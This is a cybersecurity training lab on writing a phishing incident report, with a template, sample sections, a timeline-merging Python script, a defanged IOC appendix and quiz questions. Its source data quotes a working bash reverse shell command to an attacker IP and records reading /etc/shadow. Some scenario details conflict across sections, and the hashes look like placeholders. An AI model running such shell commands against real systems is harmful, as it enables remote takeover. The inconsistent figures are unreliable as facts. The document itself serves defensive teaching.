What You'll Learn
- Structure a formal phishing incident report using industry-standard sections and formatting
- Write an executive summary that communicates impact and urgency to non-technical stakeholders
- Compile a complete incident timeline from investigation findings across multiple data sources
- Produce a blocklist-ready IOC appendix with proper defanging and categorization
- Document containment actions, lessons learned, and recommended security improvements
Lab Overview
| Detail | Value |
|---|---|
| Lab Type | Browser-Only |
| Tools Required | Browser |
| Estimated Time | 50–60 minutes |
| Difficulty | Intermediate |
| Pre-Requisites | Labs PH.1–PH.5 (findings used as report source material) |
| Deliverable | Complete phishing incident report (2,000–3,000 words) using the provided template |
Reports Are How Analysts Create Impact. You can be the best investigator in the world, but if you can't document your findings clearly, your work disappears. Incident reports are read by executives (who control budgets), legal teams (who assess liability), IT teams (who implement fixes), and auditors (who verify compliance). A well-written report turns a security incident into organizational improvement.
The Scenario
You've completed your phishing investigation across Labs PH.1–PH.5. You analyzed email headers, verified authentication records, classified phishing types, extracted IOCs, and investigated the incident in Wazuh. Now your CISO has asked for a formal incident report to present to the executive team and share with the legal department.
Your report must be understandable by non-technical executives while containing enough technical detail for the security and IT teams to act on.
The Incident Summary (Source Material)
Use these consolidated findings from the previous labs as your source material. If you completed Labs PH.1–PH.5, substitute your actual findings where applicable.
INCIDENT REFERENCE DATA
═══════════════════════
Incident ID: PHISH-2026-0217-001
Date Detected: February 17, 2026, 09:14 UTC
Date Reported: February 17, 2026, 09:47 UTC
Reported By: Michael Johnson (Finance Department)
Initial Vector: Phishing email with malicious link
Classification: Phishing → Malware Delivery → Lateral Movement
Affected Systems:
- linux-web-01 (reverse shell, privilege escalation)
- WIN-SERVER-01 (brute force, new service installation)
- dns-server-01 (C2 DNS queries observed)
- fw-edge-01 (blocked outbound C2 traffic)
Affected Accounts:
- www-data (linux-web-01, compromised via web app → sudo escalation)
- Administrator (WIN-SERVER-01, brute forced after lateral movement)
Attacker Infrastructure:
- 185.220.101.42 (SSH brute force source, C2 callback)
- 91.234.99.87 (Windows brute force source)
- globaltrade-payments.com (phishing sender domain)
- secure-docs-portal.com (phishing link)
- cdn-storage-8847.com (payload hosting)
- c2-beacon.malware-infra.net (C2 domain)
Malware:
- invoice_GT2026.exe (SHA256: e3b0c44298fc1c149afb...)
- Base64-encoded bash reverse shell (decoded: bash -i >& /dev/tcp/185.220.101.42/4445 0>&1)
Part 1: Report Template
Use the following template structure. Each section has guidance on what to include and how to write it.
Section 1: Report Header
╔═══════════════════════════════════════════════════════════════╗
║ PHISHING INCIDENT REPORT ║
║ CONFIDENTIAL — INTERNAL USE ONLY ║
╠═══════════════════════════════════════════════════════════════╣
║ Incident ID: PHISH-2026-0217-001 ║
║ Report Date: [Today's Date] ║
║ Report Author: [Your Name], SOC Analyst ║
║ Classification: CONFIDENTIAL ║
║ Distribution: CISO, Legal, IT Operations, HR ║
║ Report Version: 1.0 ║
╚═══════════════════════════════════════════════════════════════╝
Section 2: Executive Summary
Write 3-5 sentences covering:
- What happened (one sentence)
- How it was detected (one sentence)
- What the impact was (one sentence)
- What was done about it (one sentence)
- Current status (one sentence)
Writing for Executives. The executive summary is the most important section — many readers will stop here. Use business language, not technical jargon. Instead of "A base64-encoded reverse shell was executed via bash piped through /dev/tcp," write "The attacker gained remote control of our web server through a disguised command hidden in the phishing payload." Accuracy matters, but accessibility matters more.
Example Executive Summary:
EXECUTIVE SUMMARY
═════════════════
On February 17, 2026, a phishing email impersonating a vendor invoice
was delivered to a Finance Department employee. The email contained a
link that downloaded malicious software disguised as a PDF invoice.
Upon execution, the malware established a connection to attacker
infrastructure, enabling unauthorized access to two internal servers.
The attacker escalated privileges on the web server and moved laterally
to a Windows server, where a persistent backdoor was installed. The
incident was detected within 33 minutes of the initial email delivery
through automated SIEM alerting. Containment actions were executed
within 2 hours, including blocking attacker IPs, isolating affected
systems, and resetting compromised credentials. No evidence of data
exfiltration was found. The incident is currently in the eradication
and recovery phase.
Part 2: Incident Details
Section 3: Detection & Initial Response
Document how the incident was discovered and what happened in the first hour:
DETECTION & INITIAL RESPONSE
═════════════════════════════
Detection Method: [User report / SIEM alert / Email gateway / Other]
Detection Time: [timestamp]
Initial Reporter: [name and department]
Triage Analyst: [your name]
Initial Actions:
1. [First action taken and timestamp]
2. [Second action]
3. [Third action]
Time to Detection: [minutes from delivery to detection]
Time to Containment: [minutes from detection to containment]
Section 4: Attack Timeline
Build a chronological timeline using findings from your previous labs:
ATTACK TIMELINE
═══════════════
| Date/Time (UTC) | Event | Source |
|---|---|---|
| 2026-02-17 06:33:18 | Phishing email sent to M. Johnson | Email headers |
| 2026-02-17 09:14:30 | Email delivered to recipient mailbox | Email gateway |
| 2026-02-17 ~09:15 | User clicks link, downloads payload | [inferred] |
| 2026-02-17 09:17:xx | Reverse shell executed on linux-web-01 | Wazuh rule 100002 |
| 2026-02-17 09:18:xx | Recon: www-data runs 'id' via sudo | Wazuh sudo alerts |
| 2026-02-17 09:19:xx | Credential theft: cat /etc/shadow | Wazuh sudo alerts |
| 2026-02-17 09:20:xx | Full root shell obtained | Wazuh sudo alerts |
| 2026-02-17 09:25:xx | Windows brute force begins | Wazuh rule 18152 |
| 2026-02-17 09:32:xx | Successful Windows logon | Wazuh rule 60106 |
| 2026-02-17 09:35:xx | New service installed (persistence) | Wazuh rule 60108 |
| 2026-02-17 09:47:00 | User reports suspicious email to SOC | Email to phishing inbox |
| 2026-02-17 10:15:00 | Containment initiated | SOC team |
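Compiling a table like the one above from raw findings is mostly timestamp hygiene: each source stamps events in its own format and zone, and one unconverted offset can reorder the whole chain. The Python below is an added example, not lab material: it normalises constructed records from the sender's Date: header, the gateway log, Wazuh alerts and the SOC ticket to UTC, sorts them, and derives the Section 3 time-to-report and time-to-containment figures. The Wazuh seconds, the +0200 offset on the Date: header and the ticket's dd/mm/yyyy format are assumptions.

```python
"""Merge findings from several sources into one UTC-ordered attack timeline. Added
example for this lab, not the lab's own material. Records are constructed from the
report data; Wazuh seconds and the +0200 offset on the Date: header are assumed."""
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime
# Constructed source records, each in the format its system actually emits.
EMAIL_DATE = "Tue, 17 Feb 2026 08:33:18 +0200"      # RFC 5322 Date: header, sender's local offset
GATEWAY_LOG = "2026-02-17 09:14:30 deliver to=mjohnson status=sent"   # gateway log line, UTC
WAZUH_ALERTS = [                                    # (ISO 8601 alert time, rule id, event)
    ("2026-02-17T09:35:11.260+0000", "60108", "New service installed (persistence)"),
    ("2026-02-17T09:17:42.118+0000", "100002", "Reverse shell executed on linux-web-01"),
    ("2026-02-17T09:25:03.904+0000", "18152", "Windows brute force begins"),
]
USER_REPORT = "17/02/2026 09:47"                    # ticket timestamp, assumed dd/mm/yyyy UTC
CONTAINMENT = "2026-02-17T10:15:00Z"                # SOC case note

def to_utc(ts: datetime) -> datetime:
    """Normalise to UTC; refuse naive values so a missing zone cannot skew the order."""
    if ts.tzinfo is None:
        raise ValueError("timestamp has no timezone")
    return ts.astimezone(timezone.utc)

def build_timeline() -> list:
    """Return (time_utc, event, source) tuples sorted chronologically."""
    events = [
        (to_utc(parsedate_to_datetime(EMAIL_DATE)),
         "Phishing email sent to M. Johnson", "Email headers"),
        (datetime.strptime(GATEWAY_LOG[:19], "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc),
         "Email delivered to recipient mailbox", "Email gateway"),
        (datetime.strptime(USER_REPORT, "%d/%m/%Y %H:%M").replace(tzinfo=timezone.utc),
         "User reports suspicious email to SOC", "Phishing inbox"),
        (to_utc(datetime.strptime(CONTAINMENT, "%Y-%m-%dT%H:%M:%S%z")),
         "Containment initiated", "SOC team"),
    ]
    for raw, rule, event in WAZUH_ALERTS:           # %z accepts +0000 as well as +00:00 and Z
        events.append((to_utc(datetime.strptime(raw, "%Y-%m-%dT%H:%M:%S.%f%z")),
                       event, f"Wazuh rule {rule}"))
    return sorted(events, key=lambda e: e[0])

def response_metrics(timeline: list) -> dict:
    """Gaps reported in Section 3: delivery -> user report -> containment."""
    at = {event: t for t, event, _ in timeline}
    delivered = at["Email delivered to recipient mailbox"]
    reported = at["User reports suspicious email to SOC"]
    return {"time_to_report": reported - delivered,
            "time_to_containment": at["Containment initiated"] - reported}

def render(timeline: list) -> str:
    """Fixed-width rows in the template's Date/Time | Event | Source layout."""
    return "\n".join(f"{t:%Y-%m-%d %H:%M:%S}  {ev:<42} {src}" for t, ev, src in timeline)
```

Note that the 08:33 local Date: header lands at 06:33 UTC, matching the first timeline row; without the conversion it would sort after the delivery event.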
Section 5: Technical Analysis
Provide the technical deep-dive for the security team:
TECHNICAL ANALYSIS
══════════════════
Email Analysis:
- From header spoofed as billing@acme-corp.com
- Return-Path: bounce-handler@vps-mailer-node7.xyz (domain mismatch)
- SPF: FAIL | DKIM: NONE | DMARC: FAIL
- X-Mailer: PHPMailer 6.5.0
- Originating IP: 91.215.42.118
Phishing Link Chain:
hxxps://secure-docs-portal[.]com/invoice/GT-2026-8847.pdf
→ 302 redirect →
hxxps://cdn-storage-8847[.]com/dl/invoice_GT2026.exe
Malware Analysis:
File: invoice_GT2026.exe
SHA256: e3b0c44298fc1c149afb...
Behavior: Base64-decoded bash reverse shell
C2: 185.220.101.42:4445 (HTTPS callback)
Secondary DNS: c2-beacon.malware-infra[.]net
Lateral Movement:
Source: linux-web-01 (www-data → root via sudo)
Target: WIN-SERVER-01 (Administrator via brute force)
Persistence: New Windows service installed
Part 3: Impact & Response
Section 6: Impact Assessment
IMPACT ASSESSMENT
═════════════════
| Category | Impact Level | Details |
|---|---|---|
| Confidentiality | [H/M/L] | [Were credentials/data exposed?] |
| Integrity | [H/M/L] | [Were systems/data modified?] |
| Availability | [H/M/L] | [Were services disrupted?] |
| Financial | [H/M/L] | [Estimated cost of response + downtime] |
| Regulatory | [H/M/L] | [Are there notification requirements?] |
| Reputational | [H/M/L] | [Was customer data involved?] |
Systems Affected: 4 (2 compromised, 2 observed C2 traffic)
Accounts Compromised: 2 (www-data, Administrator)
Data Exfiltrated: None confirmed (but /etc/shadow was accessed)
Section 7: Containment & Eradication Actions
CONTAINMENT ACTIONS TAKEN
═════════════════════════
| # | Action | Time | Status | Owner |
|---|---|---|---|---|
| 1 | Block 185.220.101.42 at perimeter firewall | 10:15 UTC | Complete | Network Ops |
| 2 | Block 91.234.99.87 at perimeter firewall | 10:15 UTC | Complete | Network Ops |
| 3 | Block C2 domains at DNS resolver | 10:18 UTC | Complete | Network Ops |
| 4 | Isolate linux-web-01 from network | 10:20 UTC | Complete | IT Ops |
| 5 | Isolate WIN-SERVER-01 from network | 10:22 UTC | Complete | IT Ops |
| 6 | Reset Administrator password (Windows) | 10:30 UTC | Complete | IT Ops |
| 7 | Disable www-data sudo access | 10:35 UTC | Complete | IT Ops |
| 8 | Block sender domain at email gateway | 10:40 UTC | Complete | Email Admin |
| 9 | Mailbox sweep for similar phishing emails | 11:00 UTC | Complete | SOC |
| 10 | Endpoint scan for invoice_GT2026.exe | 11:30 UTC | Complete | SOC |
ERADICATION STEPS (In Progress)
- [ ] Remove reverse shell artifacts from linux-web-01
- [ ] Remove malicious Windows service from WIN-SERVER-01
- [ ] Rebuild compromised systems from clean images
- [ ] Rotate all credentials that may have been exposed
Part 4: Lessons & Recommendations
Section 8: Lessons Learned
Write 5 actionable lessons learned, structured as:
- What happened → Why it happened → How to prevent it
LESSONS LEARNED
═══════════════
1. PHISHING EMAIL BYPASSED EMAIL GATEWAY
What: Email with SPF fail, no DKIM, and DMARC fail was delivered
Why: Email gateway was not configured to enforce DMARC rejection
Fix: Enable DMARC enforcement (reject policy) on the email gateway
2. USER CLICKED MALICIOUS LINK
What: Finance employee clicked a phishing link without verification
Why: No phishing awareness training in the past 12 months
Fix: Implement quarterly phishing simulation + awareness training
3. MALWARE EXECUTED WITHOUT RESTRICTION
What: Downloaded .exe file was executed on a Linux web server
Why: No application whitelisting or execution prevention controls
Fix: Deploy application control policies (SELinux, AppArmor)
4. LATERAL MOVEMENT SUCCEEDED
What: Attacker moved from linux-web-01 to WIN-SERVER-01
Why: Flat network architecture with no segmentation between tiers
Fix: Implement network segmentation — web tier, app tier, data tier
5. SUDO ACCESS WAS OVERLY PERMISSIVE
What: www-data account executed arbitrary commands via sudo
Why: Sudoers configuration was too broad for the web service account
Fix: Restrict www-data sudoers to only specific required commands
Section 9: Recommendations
Write 5-7 prioritized recommendations:
RECOMMENDATIONS
═══════════════
| Priority | Recommendation | Owner | Timeline |
|---|---|---|---|
| CRITICAL | Enforce DMARC rejection on email gateway | Email Admin | 1 week |
| CRITICAL | Implement network segmentation (web/app/data) | Network Ops | 30 days |
| HIGH | Deploy endpoint detection & response (EDR) | Security | 30 days |
| HIGH | Restrict sudo access for service accounts | IT Ops | 1 week |
| MEDIUM | Quarterly phishing awareness training | HR/Security | Ongoing |
| MEDIUM | Implement application whitelisting on servers | IT Ops | 60 days |
| LOW | Deploy email banner for external messages | Email Admin | 2 weeks |
Part 5: IOC Appendix
Section 10: Indicators of Compromise
APPENDIX A: INDICATORS OF COMPROMISE
═════════════════════════════════════
All IOCs are defanged for safe handling in documentation.
| TYPE | IOC | CONTEXT |
|---|---|---|
| Email | invoicing@globaltrade-payments[.]com | Phishing sender |
| Email | bounce-handler@vps-mailer-node7[.]xyz | Envelope sender |
| Domain | globaltrade-payments[.]com | Phishing from domain |
| Domain | vps-mailer-node7[.]xyz | Sending infrastructure |
| Domain | secure-docs-portal[.]com | Phishing link host |
| Domain | cdn-storage-8847[.]com | Payload host |
| Domain | c2-beacon[.]malware-infra[.]net | C2 domain |
| IP Address | 185.220.101.42 | Brute force + C2 |
| IP Address | 91.234.99.87 | Windows brute force |
| IP Address | 193.42.33.107 | Email origination |
| URL | hxxps://secure-docs-portal[.]com/invoice/GT-2026-8847[.]pdf | Phishing link |
| URL | hxxps://cdn-storage-8847[.]com/dl/invoice_GT2026[.]exe | Payload URL |
| File Hash | e3b0c44298fc1c149afbf4c8996fb924... (SHA256) | Malware payload |
| File Hash | d41d8cd98f00b204e9800998ecf8427e (MD5) | Malware payload |
| File Name | invoice_GT2026.exe | Payload filename |
Report Distribution. Incident reports contain sensitive information about your organization's vulnerabilities, attack surface, and security gaps. Always mark them CONFIDENTIAL, restrict distribution to named recipients, and never share IOC appendices publicly without removing organization-specific details. Use TLP (Traffic Light Protocol) markings when sharing with external parties.
Part 6: Finalize Your Report
Quality Checklist
Review your completed report against these criteria:
- Executive summary is readable by a non-technical executive in under 60 seconds
- Timeline is chronologically accurate with specific timestamps
- Technical analysis provides enough detail for the IT team to act
- Impact assessment covers all CIA triad dimensions plus business impact
- Containment actions are numbered, timestamped, and assigned to owners
- Lessons learned follow the What → Why → Fix structure
- Recommendations are prioritized with owners and timelines
- IOC appendix is defanged and categorized by type
- No sensitive data is exposed (credentials, internal IPs beyond scope)
- Report header includes classification, distribution list, and version
Deliverable Checklist
Before completing the lab, ensure you have:
- Complete Report — All 10 sections filled out using the template
- Executive Summary — 3-5 sentences, non-technical language
- Attack Timeline — At least 10 events in chronological order
- Impact Assessment — All 6 categories rated with justification
- Lessons Learned — 5 items with What/Why/Fix structure
- IOC Appendix — All indicators defanged and categorized
Key Takeaways
- The executive summary is the most-read section — write it for a non-technical audience using business language
- Timelines must be chronologically precise — they become the foundation for legal review and insurance claims
- Lessons learned should focus on systemic improvements, not blame — "training was absent" not "the user was careless"
- IOCs must be defanged in reports to prevent accidental clicks and auto-resolution by security tools
- Reports should be versioned and have controlled distribution — they contain sensitive vulnerability information
What's Next
Congratulations — you've completed the full phishing analysis module! You've progressed from analyzing individual email headers through authentication verification, threat classification, IOC extraction, SIEM-based investigation, and professional reporting. In Module 5, you'll apply these skills to a new domain: Threat Intelligence & IOC Management with MISP.
Lab Challenge: Write the Phishing Report
10 questions · 70% to pass
What is the primary audience for the Executive Summary section of an incident report?
Why should incident reports be marked CONFIDENTIAL with a controlled distribution list?
In the Lessons Learned section, which format most effectively drives organizational improvement?
The attack timeline shows 33 minutes between email delivery (09:14) and user report (09:47). How should this metric be presented in the report?
Why must IOCs be defanged (hxxps://, domain[.]com) in the report appendix?
The Impact Assessment rates 'Confidentiality' as HIGH because /etc/shadow was accessed. Why is this significant even if no data was exfiltrated?
In the Recommendations section, why is 'Enforce DMARC rejection on email gateway' rated CRITICAL priority?
When writing the Technical Analysis section, how should you describe the base64-encoded reverse shell for the IT team vs the executive summary?
The containment actions table includes timestamps and owners for each action. Why are these details important?
Your report is complete. What is the recommended next step before distributing it to stakeholders?